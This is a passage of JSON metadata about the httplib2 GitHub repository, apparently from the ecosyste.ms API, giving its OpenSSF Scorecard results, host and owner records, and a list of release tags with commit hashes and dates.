:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/